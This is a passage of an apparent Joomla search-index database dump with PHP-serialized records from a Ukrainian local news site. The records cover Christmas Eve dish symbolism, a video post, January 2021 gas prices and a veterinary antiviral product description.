list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:48:\"2496:shcho-povinno-buti-na-stoli-na-svyat-vechir\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:70:\"/index.php/8-novini-2/2496-shcho-povinno-buti-na-stoli-na-svyat-vechir\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2496\";s:5:\"route\";s:101:\"index.php?option=com_content&view=article&id=2496:shcho-povinno-buti-na-stoli-na-svyat-vechir&catid=8\";s:5:\"title\";s:69:\"Що повинно бути на столі на СВЯТ-ВЕЧІР\";s:11:\"description\";s:2291:\" Кожна з 12 страв та деякі продукти, які входять до неї, мають глибоке символічне значення, а не просту традиційність. КУТЯ (найголовніша страва на столі, з неї починають трапезу) символізує єднання з Богом і світом померлих. Тому її залишають на ніч для душ усопших, не прибирають зі столу. МАК, який додають до куті, символізує мучеництво Ісуса Христа. МЕД — символ чистоти, надії, оптимізму, солодкого Божого Слова. КОРАЧУН (кругла буханка хліба, інколи домашньої випічки, калач) символізує смерть і воскресіння. ГОРОХ, КВАСОЛЯ — символ християнського життя у \"домашній\", \"сімейній церкві\", символ єдності роду. КАПУСНЯК — символ єдності навколо однієї основи — Христа-Бога. БОРЩ нагадує про дітей, убитих у Вифлеємську ніч за наказом Ірода. ГОЛУБЦІ - символ голуба, який уособлює мир. РИБА — знак християн, один із символів Ісуса Христа. У перших літерах грецького слова \"риба\" зашифровані слова \"Ісус Христос\", \"Спаситель\", \"Син Божий\". ВАРЕНИКИ — достаток, ситність. ГРИБИ — дві природи Ісуса Христа: божественна (шапка) і земна (корінець). ПАМПУШКИ — щастя, здоров\'я, як і вареники — достаток. УЗВАР — життялюдини, дароване Богом. ЧАСНИК — очищення від гріхів. Також символізує здоров\'я. Його кладуть на чотири кутки столу, а потім споживають, щоб зуби не боліли. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-01-06 07:04:13\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-01-06 07:04:13\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4778,'index.php?option=com_content&view=article&id=2497','index.php?option=com_content&view=article&id=2497:malin-naperedodni-rizdva&catid=8','Малин напередодні Різдва',' ','2021-01-06 09:08:30','565474f519efd5f2d29d132972db0ec4',1,1,1,'*','2021-01-06 07:08:30','0000-00-00 00:00:00','2021-01-06 07:08:30','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2497\";s:5:\"alias\";s:24:\"malin-naperedodni-rizdva\";s:7:\"summary\";s:296:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/Lp2Y9hJGRPs\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-01-06 07:08:30\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:29:\"2497:malin-naperedodni-rizdva\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:51:\"/index.php/8-novini-2/2497-malin-naperedodni-rizdva\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2497\";s:5:\"route\";s:82:\"index.php?option=com_content&view=article&id=2497:malin-naperedodni-rizdva&catid=8\";s:5:\"title\";s:46:\"Малин напередодні Різдва\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-01-06 07:08:30\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-01-06 07:08:30\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4780,'index.php?option=com_content&view=article&id=2498','index.php?option=com_content&view=article&id=2498:tsini-na-prirodnij-gaz-v-sichni-2021-roku&catid=8','Ціни на природний газ в січні 2021 року',' За даними https://gazpravda.com.ua/ ','2021-01-09 21:05:19','a9528a0ae55b3f46a03c4c6214121d08',1,1,1,'*','2021-01-09 19:05:00','0000-00-00 00:00:00','2021-01-09 19:05:00','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2498\";s:5:\"alias\";s:41:\"tsini-na-prirodnij-gaz-v-sichni-2021-roku\";s:7:\"summary\";s:280:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gaz0121.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/gaz0121.jpg\" width=\"823\"></a></p><p>За даними&nbsp;<a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-01-09 19:05:19\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:46:\"2498:tsini-na-prirodnij-gaz-v-sichni-2021-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:68:\"/index.php/8-novini-2/2498-tsini-na-prirodnij-gaz-v-sichni-2021-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2498\";s:5:\"route\";s:99:\"index.php?option=com_content&view=article&id=2498:tsini-na-prirodnij-gaz-v-sichni-2021-roku&catid=8\";s:5:\"title\";s:67:\"Ціни на природний газ в січні 2021 року\";s:11:\"description\";s:45:\" За даними https://gazpravda.com.ua/ \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-01-09 19:05:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-01-09 19:05:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4798,'index.php?option=com_content&view=article&id=2499','index.php?option=com_content&view=article&id=2499:lozeval-protivovirusnij-preparat-100-ml&catid=135','Лозеваль противовірусний препарат',' Лозеваль противовирусный, 100 мл - препарат для профилактики и лечения вирусных и бактериальных заболеваний. Повышает резистентность организма у животных и птиц. Описание и состав: раствор для внутреннего, наружного и аэрозольного применения.Фасовка: флакон 100 мл. Фармакологические свойства: Противовирусное действие за счет ингибирования внутриклеточной репродукции вирусов, обладает бактериостатическими и бактерицидными свойствами по отношению к грамположительной и грамотрицательной микрофлоре. Лозеваль повышает резистентность организма животных и птиц за счет стимулирования клеточного и гуморального иммунитета, усиления синтеза моконуклеаров и повышения уровня лизоцима. Применение: Назначение Доза Особенности Вирусные инфекции: аденовирусная инфекция, парагрипп-3, ринотрахеит, болезнь Ньюкасла, болезнь Марека, инфекционный бронхит кур, чума плотоядных, парвовирусный энтерит собак, панлейкемия кошек 1-2 мл на 10 кг массы, 1-2 раза в сутки Препарат задается с кормом или выпаивается, в течение 5 дней. После З-х дневного перерыва, при необходимости, курс повторяют. Спрофилактической целью препарат задается в тех же дозах 1 раз в день, 2 дня подряд с недельным интервалом Бактериальные инфекции животных и птиц: паратиф, колибактериоз, стрептококкоз, стафилококкоз, пастереллез 1-2 мл на 10 кг массы, 1 раз в сутки Задается в течение 5 дней. После 3-х дневного перерыва, при необходимости, курс повторяют Респираторные заболевания препарат разводят 1:1 в 5% растворе глюкозы Смазывают или закапывают в носовые ходы. Применяется для аэрозольных обработок помещения, в концентрации 1-2 мл/м3 с экспозицией 45 мин Кожные заболевания: дерматит, экзема, рожа, ожоги, гнойные раны пораженные места смазывают 2-3 раза в день применяют наружно до полного выздоровления Отиты препарат разводят 1:1 в 960 спирте или закапывают в уши по 2-3 капли (без разведения) 2 раза в день в течение 4-5 дней В акушерско-гинекологической практике вводится внутриматочно в разведении 1:1 с подсолнечным маслом или в дозе 1 мл на 10 кг массы тела (без разведения). При маститах препарат втирается в пораженные доли 3-4 раза в день до полного выздоровления в течение 4-5дней При кастрации и косметических операциях раненая поверхность смазывается 2-3 раза в день применяют до заживления раны Побочные действия: в рекомендуемых дозах не оказывает. Противопоказания: не выявлено. ','2021-02-03 11:44:17','e6a20a32ae04471b2fec4f0e19e34f63',1,1,1,'*','2021-02-03 09:19:56','0000-00-00 00:00:00','2021-02-03 09:19:56','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2499\";s:5:\"alias\";s:39:\"lozeval-protivovirusnij-preparat-100-ml\";s:7:\"summary\";s:5161:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/lozeval.jpg\"><img src=\"https://malehus.in.ua/images/stories/lozeval.jpg\" alt=\"\" class=\"fr-fil\" width=\"105\"></a>Лозеваль противовирусный, 100 мл - препарат  для профилактики и лечения вирусных и бактериальных заболеваний. Повышает  резистентность организма у животных и птиц. Описание и состав: раствор для внутреннего, наружного и  аэрозольного применения.Фасовка: флакон 100 мл. Фармакологические свойства: Противовирусное действие за счет ингибирования внутриклеточной репродукции  вирусов, обладает бактериостатическими и бактерицидными свойствами по отношению  к грамположительной и грамотрицательной микрофлоре. Лозеваль повышает  резистентность организма животных и птиц за счет стимулирования клеточного и  гуморального иммунитета, усиления синтеза моконуклеаров и повышения уровня  лизоцима.</p><p>Применение:</p><table><tbody><tr><td><p>Назначение</p></td><td><p>Доза</p></td><td><p>Особенности</p></td></tr><tr><td><p>Вирусные    инфекции: аденовирусная инфекция,    парагрипп-3, ринотрахеит, болезнь Ньюкасла, болезнь Марека, инфекционный    бронхит кур, чума плотоядных, парвовирусный энтерит собак, панлейкемия кошек </p></td><td><p>1-2    мл на 10 кг массы, 1-2 раза в сутки </p></td><td><p>Препарат    задается с кормом или выпаивается, в течение 5 дней. После З-х дневного    перерыва, при необходимости, курс повторяют. С профилактической целью    препарат задается в тех же дозах 1 раз в день, 2 дня подряд с недельным    интервалом</p></td></tr><tr><td><p>Бактериальные    инфекции животных и птиц: паратиф, колибактериоз,    стрептококкоз, стафилококкоз, пастереллез </p></td><td><p>1-2    мл на 10 кг массы, 1 раз в сутки  </p></td><td><p>Задается    в течение 5 дней. После 3-х дневного перерыва, при необходимости, курс    повторяют </p></td></tr><tr><td><p>Респираторные    заболевания</p></td><td><p>препарат    разводят 1:1 в 5% растворе глюкозы  </p></td><td><p>Смазывают    или закапывают в носовые ходы. Применяется для аэрозольных обработок    помещения, в концентрации 1-2 мл/м3 с экспозицией 45 мин</p></td></tr><tr><td><p>Кожные    заболевания: дерматит, экзема, рожа,    ожоги, гнойные раны  </p></td><td><p>пораженные    места смазывают 2-3 раза в день </p></td><td><p>применяют наружно до полного выздоровления </p></td></tr><tr><td><p>Отиты</p></td><td><p>препарат    разводят 1:1 в 960 спирте или закапывают в уши по 2-3 капли (без разведения)    2 раза в день</p></td><td><p>в течение 4-5 дней</p></td></tr><tr><td><p>В    акушерско-гинекологической практике</p></td><td><p>вводится    внутриматочно в разведении 1:1 с подсолнечным маслом или в дозе 1 мл на 10 кг    массы тела (без разведения). При маститах препарат    втирается в пораженные доли 3-4 раза в день до полного выздоровления </p></td><td><p>в течение 4-5 дней</p></td></tr><tr><td><p>При    кастрации и косметических операциях</p></td><td><p>раненая    поверхность смазывается 2-3 раза в день </p></td><td><p>применяют до    заживления раны</p></td></tr></tbody></table><p>Побочные  действия: в рекомендуемых дозах не оказывает.</p><p>Противопоказания: не выявлено.</p><p><br></p><p><br></p><!--[if !supportLineBreakNewLine]--><p><br></p><p><br></p><!--[endif]--><p><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-02-03 